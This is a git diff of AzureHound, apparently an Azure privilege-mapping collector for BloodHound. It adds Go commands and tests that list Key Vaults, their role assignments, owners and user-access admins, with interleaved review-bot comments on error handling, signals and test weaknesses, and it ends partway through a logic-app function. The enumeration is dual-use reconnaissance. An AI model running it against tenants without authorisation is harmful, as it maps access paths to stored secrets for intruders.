+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListKeyVaultOwners(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+
+ mockRoleAssignmentsChannel := make(chan azureWrapper[models.KeyVaultRoleAssignments])
+ mockTenant := azure.Tenant{}
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ channel := listKeyVaultOwners(ctx, mockRoleAssignmentsChannel)
+
+ go func() {
+ defer close(mockRoleAssignmentsChannel)
+
+ mockRoleAssignmentsChannel <- NewAzureWrapper(
+ enums.KindAZKeyVaultRoleAssignment,
+ models.KeyVaultRoleAssignments{
+ KeyVaultId: "foo",
+ RoleAssignments: []models.KeyVaultRoleAssignment{
+ {
+ RoleAssignment: azure.RoleAssignment{
+ Name: constants.OwnerRoleID,
+ Properties: azure.RoleAssignmentPropertiesWithScope{
+ RoleDefinitionId: constants.OwnerRoleID,
+ },
+ },
+ },
+ },
+ },
+ )
+ }()
+
+ if _, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ }
+
+ if _, ok := <-channel; ok {
+ t.Error("should not have recieved from channel")
+ }
+}
diff --git a/cmd/list-key-vault-role-assignments.go b/cmd/list-key-vault-role-assignments.go
new file mode 100644
index 0000000..c385d32
--- /dev/null
+++ b/cmd/list-key-vault-role-assignments.go
@@ -0,0 +1,129 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "os"
+ "os/signal"
+ "sync"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listKeyVaultRoleAssignmentsCmd)
+}
+
+var listKeyVaultRoleAssignmentsCmd = &cobra.Command{
+ Use: "key-vault-role-assignments",
+ Long: "Lists Key Vault Role Assignments",
+ Run: listKeyVaultRoleAssignmentsCmdImpl,
+ SilenceUsage: true,
+}
+
+func listKeyVaultRoleAssignmentsCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure key vault role assignments...")
+ start := time.Now()
+ subscriptions := listSubscriptions(ctx, azClient)
+ stream := listKeyVaultRoleAssignments(ctx, azClient, listKeyVaults(ctx, azClient, subscriptions))
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listKeyVaultRoleAssignments(ctx context.Context, client client.AzureClient, keyVaults <-chan interface{}) <-chan azureWrapper[models.KeyVaultRoleAssignments] {
+ var (
+ out = make(chan azureWrapper[models.KeyVaultRoleAssignments])
+ ids = make(chan string)
+ streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int))
+ wg sync.WaitGroup
+ )
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(ids)
+
+ for result := range pipeline.OrDone(ctx.Done(), keyVaults) {
+ if keyVault, ok := result.(AzureWrapper).Data.(models.KeyVault); !ok {
+ log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating key vault role assignments", "result", result)
+ return
+ } else {
+ if ok := pipeline.Send(ctx.Done(), ids, keyVault.Id); !ok {
+ return
+ }
+ }
+ }
+ }()
+
+ wg.Add(len(streams))
+ for i := range streams {
+ stream := streams[i]
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer wg.Done()
+ for id := range stream {
+ var (
+ keyVaultRoleAssignments = models.KeyVaultRoleAssignments{
+ KeyVaultId: id,
+ }
+ count = 0
+ )
+ for item := range client.ListRoleAssignmentsForResource(ctx, id, "", "") {
+ if item.Error != nil {
+ log.Error(item.Error, "unable to continue processing role assignments for this key vault", "keyVaultId", id)
+ } else {
+ keyVaultRoleAssignment := models.KeyVaultRoleAssignment{
+ KeyVaultId: id,
+ RoleAssignment: item.Ok,
+ }
+ log.V(2).Info("found key vault role assignment", "keyVaultRoleAssignment", keyVaultRoleAssignment)
+ count++
+ keyVaultRoleAssignments.RoleAssignments = append(keyVaultRoleAssignments.RoleAssignments, keyVaultRoleAssignment)
+ }
+ }
+ if ok := pipeline.Send(ctx.Done(), out, NewAzureWrapper(enums.KindAZKeyVaultRoleAssignment, keyVaultRoleAssignments)); !ok {
+ return
+ }
+ log.V(1).Info("finished listing key vault role assignments", "keyVaultId", id, "count", count)
+ }
+ }()
+ }
+
+ go func() {
+ wg.Wait()
+ close(out)
+ log.Info("finished listing all key vault role assignments")
+ }()
+
+ return out
+}
diff --git a/cmd/list-key-vault-role-assignments_test.go b/cmd/list-key-vault-role-assignments_test.go
new file mode 100644
index 0000000..d94018e
--- /dev/null
+++ b/cmd/list-key-vault-role-assignments_test.go
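Review bot: When `client.ListRoleAssignmentsForResource` yields an error inside `listKeyVaultRoleAssignments`, the log text says "unable to continue processing role assignments for this key vault", yet the loop keeps reading and the partially filled `keyVaultRoleAssignments` is sent downstream exactly like a complete one. The owners and contributors filters that consume this channel cannot tell a vault with no matching assignments from one whose listing failed, which matters when the output is used to judge who has access. Since the accompanying test expects the partial result, the smallest change is to make it visible: set a flag in the error branch and, before the send, emit `log.Info("key vault role assignments are incomplete", "keyVaultId", id, "count", count)`, with a comment stating that partial results are emitted on purpose. `config.ColStreamCount.Value().(int)` in the `var` block is also an unchecked type assertion that runs in the caller's goroutine, before either `defer panicrecovery.PanicRecovery()` is in place.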
@@ -0,0 +1,106 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListKeyVaultRoleAssignments(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+
+ mockKeyVaultsChannel := make(chan interface{})
+ mockKeyVaultRoleAssignmentChannel := make(chan client.AzureResult[azure.RoleAssignment])
+ mockKeyVaultRoleAssignmentChannel2 := make(chan client.AzureResult[azure.RoleAssignment])
+
+ mockTenant := azure.Tenant{}
+ mockError := fmt.Errorf("I'm an error")
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ mockClient.EXPECT().ListRoleAssignmentsForResource(gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any()).Return(mockKeyVaultRoleAssignmentChannel).Times(1)
+ mockClient.EXPECT().ListRoleAssignmentsForResource(gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any()).Return(mockKeyVaultRoleAssignmentChannel2).Times(1)
+ channel := listKeyVaultRoleAssignments(ctx, mockClient, mockKeyVaultsChannel)
+
+ go func() {
+ defer close(mockKeyVaultsChannel)
+ mockKeyVaultsChannel <- AzureWrapper{
+ Data: models.KeyVault{},
+ }
+ mockKeyVaultsChannel <- AzureWrapper{
+ Data: models.KeyVault{},
+ }
+ }()
+ go func() {
+ defer close(mockKeyVaultRoleAssignmentChannel)
+ mockKeyVaultRoleAssignmentChannel <- client.AzureResult[azure.RoleAssignment]{
+ Ok: azure.RoleAssignment{
+ Properties: azure.RoleAssignmentPropertiesWithScope{
+ RoleDefinitionId: constants.KeyVaultContributorRoleID,
+ },
+ },
+ }
+ mockKeyVaultRoleAssignmentChannel <- client.AzureResult[azure.RoleAssignment]{
+ Ok: azure.RoleAssignment{
+ Properties: azure.RoleAssignmentPropertiesWithScope{
+ RoleDefinitionId: constants.ContributorRoleID,
+ },
+ },
+ }
+ }()
+ go func() {
+ defer close(mockKeyVaultRoleAssignmentChannel2)
+ mockKeyVaultRoleAssignmentChannel2 <- client.AzureResult[azure.RoleAssignment]{
+ Ok: azure.RoleAssignment{
+ Properties: azure.RoleAssignmentPropertiesWithScope{
+ RoleDefinitionId: constants.KeyVaultAdministratorRoleID,
+ },
+ },
+ }
+ mockKeyVaultRoleAssignmentChannel2 <- client.AzureResult[azure.RoleAssignment]{
+ Error: mockError,
+ }
+ }()
+
+ if result, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ } else if len(result.Data.RoleAssignments) != 2 {
+ t.Errorf("got %v, want %v", len(result.Data.RoleAssignments), 2)
+ }
+
+ if result, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ } else if len(result.Data.RoleAssignments) != 1 {
+ t.Errorf("got %v, want %v", len(result.Data.RoleAssignments), 1)
+ }
+}
diff --git a/cmd/list-key-vault-user-access-admins.go b/cmd/list-key-vault-user-access-admins.go
new file mode 100644
index 0000000..e0e2515
--- /dev/null
+++ b/cmd/list-key-vault-user-access-admins.go
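Review bot: `TestListKeyVaultRoleAssignments` asserts that the first value received carries two assignments and the second carries one, which holds only if the two key vaults are handled in order by a single worker. `listKeyVaultRoleAssignments` fans out over `config.ColStreamCount.Value().(int)` streams, so with more than one stream (the value is set outside this hunk) the results, and which mock channel each worker is handed, could arrive in either order. Collecting both lengths and comparing them without regard to order, or pinning the stream count to 1 for the test, would make it deterministic. The test also never checks that `channel` is closed after the second result.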
@@ -0,0 +1,83 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "os"
+ "os/signal"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/internal"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listKeyVaultUserAccessAdminsCmd)
+}
+
+var listKeyVaultUserAccessAdminsCmd = &cobra.Command{
+ Use: "key-vault-user-access-admins",
+ Long: "Lists Azure Key Vault User Access Admins",
+ Run: listKeyVaultUserAccessAdminsCmdImpl,
+ SilenceUsage: true,
+}
+
+func listKeyVaultUserAccessAdminsCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure key vault user access admins...")
+ start := time.Now()
+ subscriptions := listSubscriptions(ctx, azClient)
+ keyVaults := listKeyVaults(ctx, azClient, subscriptions)
+ kvRoleAssignments := listKeyVaultRoleAssignments(ctx, azClient, keyVaults)
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ stream := listKeyVaultUserAccessAdmins(ctx, kvRoleAssignments)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listKeyVaultUserAccessAdmins(
+ ctx context.Context,
+ kvRoleAssignments <-chan azureWrapper[models.KeyVaultRoleAssignments],
+) <-chan any {
+ return pipeline.Map(ctx.Done(), kvRoleAssignments, func(ra azureWrapper[models.KeyVaultRoleAssignments]) any {
+ filteredAssignments := internal.Filter(ra.Data.RoleAssignments, kvRoleAssignmentFilter(constants.UserAccessAdminRoleID))
+
+ kvContributors := internal.Map(filteredAssignments, func(ra models.KeyVaultRoleAssignment) models.KeyVaultUserAccessAdmin {
+ return models.KeyVaultUserAccessAdmin{
+ UserAccessAdmin: ra.RoleAssignment,
+ KeyVaultId: ra.KeyVaultId,
+ }
+ })
+
+ return NewAzureWrapper(enums.KindAZKeyVaultUserAccessAdmin, models.KeyVaultUserAccessAdmins{
+ KeyVaultId: ra.Data.KeyVaultId,
+ UserAccessAdmins: kvContributors,
+ })
+ })
+}
diff --git a/cmd/list-key-vault-user-access-admins_test.go b/cmd/list-key-vault-user-access-admins_test.go
new file mode 100644
index 0000000..82f7c6e
--- /dev/null
+++ b/cmd/list-key-vault-user-access-admins_test.go
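Review bot: `os.Kill` in `signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)` has no effect because SIGKILL cannot be caught, and SIGTERM is not registered, so a plain `kill` or a container stop ends the process without the deferred `gracefulShutdown(stop)` running. I would register the catchable signal instead: `ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, syscall.SIGTERM)` (needs the `syscall` import). The same call appears in listKeyVaultsCmdImpl, listLogicAppRoleAssignmentImpl, listLogicAppsCmdImpl, listManagedClusterRoleAssignmentImpl, listManagedClustersCmdImpl and listManagementGroupDescendantsCmdImpl. Separately, the local `kvContributors` in listKeyVaultUserAccessAdmins holds user access admins and reads like a copy-paste name; `kvUserAccessAdmins` would match what it contains.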
@@ -0,0 +1,76 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListKeyVaultUserAccessAdmins(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+
+ mockRoleAssignmentsChannel := make(chan azureWrapper[models.KeyVaultRoleAssignments])
+ mockTenant := azure.Tenant{}
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ channel := listKeyVaultUserAccessAdmins(ctx, mockRoleAssignmentsChannel)
+
+ go func() {
+ defer close(mockRoleAssignmentsChannel)
+
+ mockRoleAssignmentsChannel <- NewAzureWrapper(
+ enums.KindAZKeyVaultRoleAssignment,
+ models.KeyVaultRoleAssignments{
+ KeyVaultId: "foo",
+ RoleAssignments: []models.KeyVaultRoleAssignment{
+ {
+ RoleAssignment: azure.RoleAssignment{
+ Name: constants.UserAccessAdminRoleID,
+ Properties: azure.RoleAssignmentPropertiesWithScope{
+ RoleDefinitionId: constants.UserAccessAdminRoleID,
+ },
+ },
+ },
+ },
+ },
+ )
+ }()
+
+ if _, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ }
+
+ if _, ok := <-channel; ok {
+ t.Error("should not have recieved from channel")
+ }
+}
diff --git a/cmd/list-key-vaults.go b/cmd/list-key-vaults.go
new file mode 100644
index 0000000..8596a4e
--- /dev/null
+++ b/cmd/list-key-vaults.go
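Review bot: TestListKeyVaultUserAccessAdmins discards the value it receives, so it would pass whether the role filter kept nothing, kept the right assignment, or kept everything. This filter decides which principals are reported as User Access Administrator on a vault, so I would add a second input assignment with a different `RoleDefinitionId` (for example `constants.ContributorRoleID`) and assert that the received record carries `KeyVaultId` "foo" and exactly one entry in `UserAccessAdmins`. The `mockClient` and its `TenantInfo()` expectation are not passed to listKeyVaultUserAccessAdmins and can be dropped. The failure message "should not have recieved from channel" has a typo ("received").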
@@ -0,0 +1,130 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "os"
+ "os/signal"
+ "sync"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listKeyVaultsCmd)
+}
+
+var listKeyVaultsCmd = &cobra.Command{
+ Use: "key-vaults",
+ Long: "Lists Azure Key Vaults",
+ Run: listKeyVaultsCmdImpl,
+ SilenceUsage: true,
+}
+
+func listKeyVaultsCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ azClient := connectAndCreateClient()
+ log.Info("collecting azure key vaults...")
+ start := time.Now()
+ stream := listKeyVaults(ctx, azClient, listSubscriptions(ctx, azClient))
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+}
+
+func listKeyVaults(ctx context.Context, client client.AzureClient, subscriptions <-chan interface{}) <-chan interface{} {
+ var (
+ out = make(chan interface{})
+ ids = make(chan string)
+ streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int))
+ wg sync.WaitGroup
+ )
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(ids)
+
+ for result := range pipeline.OrDone(ctx.Done(), subscriptions) {
+ if subscription, ok := result.(AzureWrapper).Data.(models.Subscription); !ok {
+ log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating key vaults", "result", result)
+ return
+ } else {
+ if ok := pipeline.Send(ctx.Done(), ids, subscription.SubscriptionId); !ok {
+ return
+ }
+ }
+ }
+ }()
+
+ wg.Add(len(streams))
+ for i := range streams {
+ stream := streams[i]
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer wg.Done()
+ for id := range stream {
+ count := 0
+ for item := range client.ListAzureKeyVaults(ctx, id, query.RMParams{Top: 999}) {
+ if item.Error != nil {
+ log.Error(item.Error, "unable to continue processing key vaults for this subscription", "subscriptionId", id)
+ } else {
+ // the embedded struct's values override top-level properties so TenantId
+ // needs to be explicitly set.
+ keyVault := models.KeyVault{
+ KeyVault: item.Ok,
+ SubscriptionId: id,
+ ResourceGroup: item.Ok.ResourceGroupId(),
+ TenantId: item.Ok.Properties.TenantId,
+ }
+ log.V(2).Info("found key vault", "keyVault", keyVault)
+ count++
+ if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: enums.KindAZKeyVault,
+ Data: keyVault,
+ }); !ok {
+ return
+ }
+ }
+ }
+ log.V(1).Info("finished listing key vaults", "subscriptionId", id, "count", count)
+ }
+ }()
+ }
+
+ go func() {
+ wg.Wait()
+ close(out)
+ log.Info("finished listing all key vaults")
+ }()
+
+ return out
+}
diff --git a/cmd/list-key-vaults_test.go b/cmd/list-key-vaults_test.go
new file mode 100644
index 0000000..9629d02
--- /dev/null
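Review bot: In listKeyVaults the outer assertion in `result.(AzureWrapper).Data.(models.Subscription)` is the single-value form, so a value of any other type panics before the `!ok` branch can log it; only the inner assertion is checked. I would check both: `if w, ok := result.(AzureWrapper); !ok { … } else if subscription, ok := w.Data.(models.Subscription); !ok { … }`. The failure branch also returns and closes `ids`, so the remaining subscriptions are dropped while the command still logs "collection completed"; apart from one error line, nothing tells the operator that the key vault inventory is partial. The same pattern is in listLogicAppRoleAssignments, listLogicApps, listManagedClusterRoleAssignments, listManagedClusters and listManagementGroupDescendants.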
+++ b/cmd/list-key-vaults_test.go 
@@ -0,0 +1,109 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "testing"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/client/mocks"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+ "go.uber.org/mock/gomock"
+)
+
+func init() {
+ setupLogger()
+}
+
+func TestListKeyVaults(t *testing.T) {
+ ctrl := gomock.NewController(t)
+ defer ctrl.Finish()
+ ctx := context.Background()
+
+ mockClient := mocks.NewMockAzureClient(ctrl)
+
+ mockSubscriptionsChannel := make(chan interface{})
+ mockKeyVaultChannel := make(chan client.AzureResult[azure.KeyVault])
+ mockKeyVaultChannel2 := make(chan client.AzureResult[azure.KeyVault])
+
+ mockTenant := azure.Tenant{}
+ mockError := fmt.Errorf("I'm an error")
+ mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes()
+ mockClient.EXPECT().ListAzureKeyVaults(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockKeyVaultChannel).Times(1)
+ mockClient.EXPECT().ListAzureKeyVaults(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockKeyVaultChannel2).Times(1)
+ channel := listKeyVaults(ctx, mockClient, mockSubscriptionsChannel)
+
+ go func() {
+ defer close(mockSubscriptionsChannel)
+ mockSubscriptionsChannel <- AzureWrapper{
+ Data: models.Subscription{},
+ }
+ mockSubscriptionsChannel <- AzureWrapper{
+ Data: models.Subscription{},
+ }
+ }()
+ go func() {
+ defer close(mockKeyVaultChannel)
+ mockKeyVaultChannel <- client.AzureResult[azure.KeyVault]{
+ Ok: azure.KeyVault{},
+ }
+ mockKeyVaultChannel <- client.AzureResult[azure.KeyVault]{
+ Ok: azure.KeyVault{},
+ }
+ }()
+ go func() {
+ defer close(mockKeyVaultChannel2)
+ mockKeyVaultChannel2 <- client.AzureResult[azure.KeyVault]{
+ Ok: azure.KeyVault{},
+ }
+ mockKeyVaultChannel2 <- client.AzureResult[azure.KeyVault]{
+ Error: mockError,
+ }
+ }()
+
+ if result, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ } else if wrapper, ok := result.(AzureWrapper); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{})
+ } else if _, ok := wrapper.Data.(models.KeyVault); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.KeyVault{})
+ }
+
+ if result, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ } else if wrapper, ok := result.(AzureWrapper); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{})
+ } else if _, ok := wrapper.Data.(models.KeyVault); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.KeyVault{})
+ }
+
+ if result, ok := <-channel; !ok {
+ t.Fatalf("failed to receive from channel")
+ } else if wrapper, ok := result.(AzureWrapper); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{})
+ } else if _, ok := wrapper.Data.(models.KeyVault); !ok {
+ t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.KeyVault{})
+ }
+
+ if _, ok := <-channel; ok {
+ t.Error("should not have recieved from channel")
+ }
+}
diff --git a/cmd/list-logic-app-role-assignments.go b/cmd/list-logic-app-role-assignments.go
new file mode 100644
index 0000000..5af69f2
--- /dev/null
+++ b/cmd/list-logic-app-role-assignments.go
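Review bot: TestListKeyVaults feeds empty `models.Subscription{}` and `azure.KeyVault{}` values and matches every argument with `gomock.Any()`, so it checks only the Go types of what comes out and not the field mapping that listKeyVaults itself comments on (TenantId has to be set explicitly from `item.Ok.Properties.TenantId`). I would give the two subscriptions distinct `SubscriptionId` values and the key vaults a tenant id, then assert `SubscriptionId` and `TenantId` on each received `models.KeyVault`; with more than one worker stream the arrival order may vary, so compare as a set. The three identical receive-and-assert blocks could be a short loop.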
@@ -0,0 +1,141 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "os"
+ "os/signal"
+ "path"
+ "sync"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listLogicAppRoleAssignment)
+}
+
+var listLogicAppRoleAssignment = &cobra.Command{
+ Use: "logic-app-role-assignments",
+ Long: "Lists Azure Logic app Role Assignments",
+ Run: listLogicAppRoleAssignmentImpl,
+ SilenceUsage: true,
+}
+
+func listLogicAppRoleAssignmentImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ if err := testConnections(); err != nil {
+ exit(err)
+ } else if azClient, err := newAzureClient(); err != nil {
+ exit(err)
+ } else {
+ log.Info("collecting azure logic app role assignments...")
+ start := time.Now()
+ subscriptions := listSubscriptions(ctx, azClient)
+ stream := listLogicAppRoleAssignments(ctx, azClient, listLogicApps(ctx, azClient, subscriptions))
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+ }
+}
+
+func listLogicAppRoleAssignments(ctx context.Context, client client.AzureClient, logicapps <-chan interface{}) <-chan interface{} {
+ var (
+ out = make(chan interface{})
+ ids = make(chan string)
+ streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int))
+ wg sync.WaitGroup
+ )
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(ids)
+
